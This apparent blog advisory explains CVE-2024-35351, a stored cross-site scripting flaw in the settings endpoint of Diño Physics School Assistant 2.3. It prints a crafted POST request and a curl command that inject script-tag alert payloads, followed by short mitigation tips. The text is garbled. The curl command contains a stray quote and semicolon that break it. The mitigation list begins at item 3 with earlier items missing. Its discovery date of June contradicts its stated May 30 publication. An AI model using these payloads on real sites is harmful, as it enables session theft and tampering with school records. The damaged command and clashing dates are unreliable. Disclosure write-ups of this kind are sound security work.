CVE-2024-35351 - Cross-Site Scripting Vulnerability in Diño Physics School Assistant 2.3 (with Exploit Example)

On June 2024, a new security vulnerability was discovered in Diño Physics School Assistant version 2.3. This is tracked as CVE-2024-35351. In this article, we'll break down what this vulnerability means, how it can be exploited (with simple code examples), and what you should do if you use this software.

What is CVE-2024-35351?

CVE-2024-35351 is a Cross-Site Scripting (XSS) vulnerability in the Diño Physics School Assistant 2.3 web application. The issue is in the file /classes/SystemSettings.php?f=update_settings, where an attacker can manipulate the name parameter to inject JavaScript code. If someone with admin access to the software clicks on a crafted link, the attacker's code will run in their browser.

In Simple Words

Basically, if you use Diño Physics School Assistant 2.3 and visit a malicious link, a hacker could control what your browser does. This could let them steal your login info, change grades, or do other bad stuff within the system.

The vulnerable script is

/classes/SystemSettings.php?f=update_settings

The script takes input from the name parameter in an HTTP request. It does not properly sanitize this input.

For example, if you send a request like

POST /classes/SystemSettings.php?f=update_settings HTTP/1.1
Host: vulnerable-site.com
Content-Type: application/x-www-form-urlencoded

name=<script>alert('xss')</script>&value=test

What happens?

The backend script will save and echo back this value without cleaning or encoding it. The next time the settings page loads, the <script>alert('xss')</script> code will run in the admin's browser.

Here’s a simplified exploit using curl

curl -k -X POST "https://YOUR-DINO-SITE/classes/SystemSettings.php?f=update_settings"; \
    -d "name=%3Cscript%3Ealert('CVE-2024-35351')%3C%2Fscript%3E&value=test"

How does this work?
- We're sending the payload <script>alert('CVE-2024-35351')</script> in the parameter name, URL encoded.

Sanitize Input: Ensure all input values are HTML-encoded or sanitized before displaying them.

3. WAF/Filtering: Use a web application firewall to block script injection attempts.

Reference Links

- CVE Details for CVE-2024-35351
- OWASP XSS Cheatsheet
- Basic XSS Explanation by PortSwigger

Final Thoughts

CVE-2024-35351 proves that web apps need careful input validation. If you run or develop Diño Physics School Assistant 2.3, don't ignore this! Preventing XSS is not just about avoiding popups — it’s about protecting your users and critical data.

Stay safe, always update your software, and validate all user input!

Timeline

Published on: 05/30/2024 17:15:33 UTC
Last modified on: 07/03/2024 02:01:35 UTC